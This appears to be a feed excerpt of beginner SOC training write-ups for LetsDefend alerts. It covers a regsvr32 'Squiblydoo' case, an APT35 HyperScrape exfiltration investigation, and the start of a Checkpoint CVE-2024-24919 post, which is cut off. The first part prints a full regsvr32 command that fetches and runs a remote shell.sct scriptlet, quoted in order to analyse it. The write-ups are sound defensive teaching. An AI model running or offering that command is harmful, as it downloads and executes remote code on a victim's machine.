&lt;pre class="highlight batchfile"&gt;&lt;code&gt;&lt;span class="kd"&gt;C&lt;/span&gt;:\Windows\System32\cmd.exe &lt;span class="na"&gt;/c &lt;/span&gt;&lt;span class="nb"&gt;regsvr32.exe&lt;/span&gt; &lt;span class="na"&gt;/s /u /i&lt;/span&gt;&lt;span class="nl"&gt;:http&lt;/span&gt;://84.38.130.118.com/shell.sct &lt;span class="kd"&gt;scrobj&lt;/span&gt;.dll
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;This command launches Windows Command Prompt to silently run regsvr32 with flags that suppress prompts (/s), unregister mode (/u), and pass a remote scriptlet URL via /i: to scrobj.dll, the Script Component runtime. In practice, this is a well-known “living off the land” technique often called Squiblydoo, where attackers abuse trusted Windows binaries to download and execute malicious code from a remote server while bypassing some application controls. The URL shown (&lt;a href="http://84.38.130.118.com/shell.sct" rel="noopener noreferrer"&gt;http://84.38.130.118.com/shell.sct&lt;/a&gt;) suggests retrieval of a .sct scriptlet named shell.sct, which is highly suspicious and commonly associated with malware payload delivery, persistence, or remote command execution. On a real system, this should be treated as a likely malicious execution attempt and investigated immediately (process tree, network logs, DNS resolution, downloaded content, persistence artifacts, EDR alerts).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lcft3dc3uywgqt9eqf5.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2lcft3dc3uywgqt9eqf5.png" alt="email" width="800" height="432"&gt;&lt;/a&gt;&lt;br&gt;
I head to Email Security as look for an email from the sender projectmanagement[@]pm[.]me  &lt;/p&gt;

&lt;p&gt;It contains an attachment named &lt;code&gt;mail.rtf&lt;/code&gt; with "infected" as its password.&lt;/p&gt;

&lt;p&gt;Now I go to VirusTotal and search the file hash on it&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05enx1ynijvt4hbftoxg.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F05enx1ynijvt4hbftoxg.png" alt="virustotal" width="800" height="418"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;25 out of 61 vendors flag this file as malicious.&lt;/p&gt;

&lt;p&gt;Because &lt;code&gt;regsvr32.exe&lt;/code&gt; was used to run a remote script and possibly leverage &lt;code&gt;scrobj.dll&lt;/code&gt;, the activity strongly suggested an ongoing system compromise. Since the remote payload’s exact functionality was unknown—it could have been a reverse shell, ransomware loader, or command-and-control beacon—the system needed to be isolated immediately.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvzpwkn2psfluj13ndl88.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvzpwkn2psfluj13ndl88.png" alt="contained" width="800" height="425"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Following were my answers for the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14rrwr0e5noz5rbkx2gh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F14rrwr0e5noz5rbkx2gh.png" alt="pb1" width="800" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp8vyzfmgpgo2ua30cpfo.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fp8vyzfmgpgo2ua30cpfo.png" alt="pb2" width="800" height="426"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftr2ieflaqy8gw1y203dk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ftr2ieflaqy8gw1y203dk.png" alt="log2" width="800" height="448"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Looking at the above screenshot we can see the source IP (internal network) contacted the destination IP which is the SMTP IP in the alert. So, C2 communication did take place&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fko5kx3h51l8u5m1cwtwr.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fko5kx3h51l8u5m1cwtwr.png" alt="pb3" width="800" height="471"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flpb153sieebpu90nm16z.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flpb153sieebpu90nm16z.png" alt="contain" width="800" height="371"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We already contained the affected host.&lt;/p&gt;

&lt;p&gt;Artifacts are added:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnk8mk6kchzs8tu16mnv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fdnk8mk6kchzs8tu16mnv.png" alt="artifacts" width="800" height="593"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After adding the Analyst's notes, we finish the playbook:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Friv22x29rbzemznblf4v.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Friv22x29rbzemznblf4v.png" alt="finish" width="800" height="254"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>education</category>
      <category>networksec</category>
    </item>
    <item>
      <title>LetsDefend SOC250 - APT35 HyperScrape Data Exfiltration Tool Detected</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 26 Apr 2026 12:15:58 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc250-apt35-hyperscrape-data-exfiltration-tool-detected-3c03</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc250-apt35-hyperscrape-data-exfiltration-tool-detected-3c03</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkttonhp95wmjj1e2s2e4.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fkttonhp95wmjj1e2s2e4.png" alt="takeownership" width="800" height="313"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start by taking the ownership of the alert.&lt;/p&gt;

&lt;p&gt;Next we create case for the alert.&lt;/p&gt;

&lt;p&gt;Next step is for us too start the playbook&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u1gfruyn0u1dbkjhkl0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F1u1gfruyn0u1dbkjhkl0.png" alt="playbook" width="800" height="226"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Before we move ahead, let's search for the file's hash on VirusTotal:&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5vz21fhe43hjny3osj2f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F5vz21fhe43hjny3osj2f.png" alt="virustotal" width="800" height="427"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;50 out of 70 vendors flag it as malicious, enough for us to conclude that is is.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvkt3wmirg3n0hgprtdui.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fvkt3wmirg3n0hgprtdui.png" alt="enfpoint" width="800" height="382"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Next we move on to Endpoint Security to find if the malware was actually running on the infected host, and from the above screenshot we see that it is.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyi5lyhqt3kf199ftbwb8.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fyi5lyhqt3kf199ftbwb8.png" alt="logdescription" width="800" height="388"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Since the rule says that it was a data exfiltration attempt, the next step is we move on to Log Management and filter the logs with the IP as the filter.&lt;br&gt;
The firewall action saying SUCCESS, means that the firewall allowed it.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsp5a87hfy9ch1ckq7vtv.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fsp5a87hfy9ch1ckq7vtv.png" alt="logon" width="800" height="415"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the screenshot of a log stating a successful logon (EventID 4624) by the source IP 173.209.51[.]54.&lt;/p&gt;

&lt;p&gt;I look up the IP address on the Threat Intel tab and find out that it is associated with APT35 CharmingKitten (&lt;a href="https://malpedia.caad.fkie.fraunhofer.de/actor/charming_kitten" rel="noopener noreferrer"&gt;https://malpedia.caad.fkie.fraunhofer.de/actor/charming_kitten&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faeos8vs5as45otcybvca.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Faeos8vs5as45otcybvca.png" alt="ip" width="800" height="378"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This is the IP that was contacted by the host after the program ran.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft3uqregrpv5ltei0cqpu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Ft3uqregrpv5ltei0cqpu.png" alt="Iporption" width="800" height="439"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This IP belongs to the malicious IP&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flh84g4kqg8td55ezoxbi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flh84g4kqg8td55ezoxbi.png" alt="raw log" width="702" height="691"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After searching for Arthur's email id (arthur@letsdefend[.]io) in Email Security, there's no traffic.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foc0h4hz53ierdybgit0r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Foc0h4hz53ierdybgit0r.png" alt="popop" width="800" height="355"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After checking further in Endpoint Security, we see a program MpCmdRun.exe&lt;br&gt;
which ran the command SignaturesUpdateService with the -ScheduleJob and -UnmanagedUpdate parameters. This means that the file was able to modify the signatures&lt;/p&gt;

&lt;p&gt;Let's start the playbook&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg9oxawf6jqvyzndnb4x0.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fg9oxawf6jqvyzndnb4x0.png" alt="verify" width="800" height="324"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flolena4suflmm5cwncyq.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Flolena4suflmm5cwncyq.png" alt="idrecon" width="800" height="280"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fis3jrekp94wja2s5zwc7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fis3jrekp94wja2s5zwc7.png" alt="log" width="800" height="432"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhflo6bvrjunv0xzbncjc.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fhflo6bvrjunv0xzbncjc.png" alt="checkalert" width="800" height="482"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz3r1h9jwjzj46uuel1zw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fz3r1h9jwjzj46uuel1zw.png" alt="ans1" width="780" height="295"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fghwazvfw0pujuily3syi.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fghwazvfw0pujuily3syi.png" alt="attackerip" width="800" height="294"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjdgv6xi7cxpitwm49n6y.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjdgv6xi7cxpitwm49n6y.png" alt="malicious" width="800" height="500"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjqkvuuz83alnxbncfr7g.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fjqkvuuz83alnxbncfr7g.png" alt="morethan1" width="800" height="277"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fccluwwg6fbsje85m5smw.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fccluwwg6fbsje85m5smw.png" alt="containescription" width="800" height="252"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fprf9sdjah1mzgmxsjo27.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fprf9sdjah1mzgmxsjo27.png" alt="contained" width="800" height="389"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs3rrdavlj02nekgsn2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fmfs3rrdavlj02nekgsn2.png" alt="artifatsadded" width="800" height="514"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Analyst's notes:&lt;br&gt;
On December 27, 2023, at 11:22 AM, I identified an alert for suspicious behavior linked to a malicious file (hash: cd2ba296828660ecd07a36e8931b851dda0802069ed926b3161745aae9aa6daa), which VirusTotal confirmed as malicious with a score of 51. Upon investigation, I found that the file executed EmailDownloader.exe, though no associated emails were found in the email security logs. Log analysis revealed a file download at 11:21:48 on the host Arthur, where explorer.exe launched EmailDownloader.exe at 11:21:37, followed by MpCmdRun.exe running SignaturesUpdateService -ScheduleJob -UnmanagedUpdate at 11:38:10. The host was immediately contained with no further compromise, and I recommend blocking the attacker’s IP address and resetting the host’s password.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frrrc7eqrqz124ypjam6c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Frrrc7eqrqz124ypjam6c.png" alt="finidh" width="800" height="233"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now we finish the playbook and close the alert.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>socanalysis</category>
      <category>cybersecurity</category>
      <category>career</category>
    </item>
    <item>
      <title>LetsDefend SOC287 - Arbitrary File Read on Checkpoint Security Gateway [CVE-2024-24919]</title>
      <dc:creator>Hitanshu Gedam</dc:creator>
      <pubDate>Sun, 26 Apr 2026 08:03:32 +0000</pubDate>
      <link>https://dev.to/hitanshugedam/letsdefend-soc287-arbitrary-file-read-on-checkpoint-security-gateway-cve-2024-24919-a49</link>
      <guid>https://dev.to/hitanshugedam/letsdefend-soc287-arbitrary-file-read-on-checkpoint-security-gateway-cve-2024-24919-a49</guid>
      <description>&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fopxxqgfvkmy0xszm1tsk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fopxxqgfvkmy0xszm1tsk.png" alt="take ownership" width="800" height="326"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We start with taking ownership of the alert.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbut2efc1bh77khfctg39.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fbut2efc1bh77khfctg39.png" alt="ownership taken" width="776" height="568"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Our next step is to create a case for starting our investigation.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2kc5bq612tnpxjjyzned.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F2kc5bq612tnpxjjyzned.png" alt="created case" width="776" height="562"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;After we start the playbook&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gohx9pb1azp1cdib2hf.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2F4gohx9pb1azp1cdib2hf.png" alt="playbook1" width="800" height="464"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;We need to understand why the alert was triggered&lt;/p&gt;

